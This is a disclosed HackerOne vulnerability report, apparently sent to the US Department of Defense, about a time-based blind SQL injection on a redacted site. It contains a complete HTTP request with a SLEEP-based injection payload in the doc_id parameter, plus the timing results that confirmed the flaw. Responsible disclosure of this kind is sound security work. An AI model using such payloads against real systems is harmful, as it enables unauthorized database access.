SQL injection on the https://████/

Disclosed: 2019-10-04 15:19:20 By sp1d3rs To deptofdefense
High
Vulnerability Details
##Description Hello. I was able to find Blind SQL injection on the https://███/ Database appears to be MySQL 5. ##POC ``` GET /library.php?path=test&doc_id=1%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(1)))WUeh) HTTP/1.1 Host: ██████ Connection: keep-alive Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en,ru;q=0.9,en-US;q=0.8,uk;q=0.7 Cookie: _ga=GA1.2.1697249984.1548431559 ``` By issuing sleep(0) response will be delayed to 0 seconds. By issuing sleep(1) response will be delayed to 5 seconds. By issuing sleep(2) response will be delayed to 10 seconds. By issuing sleep(5) response will be delayed to 25 seconds. As POC, I retrieved count of databases (3). No other information was accessed (such as tables or data): Apparently, SQL statement is executing 5 times on the database side, because response time always 5 times bigger than supplied sleep value. ## Impact SQL injection usually have high-critical impact.
Actions
View on HackerOne
Report Stats
  • Report ID: 488795
  • State: Closed
  • Substate: resolved
  • Upvotes: 22
Share this report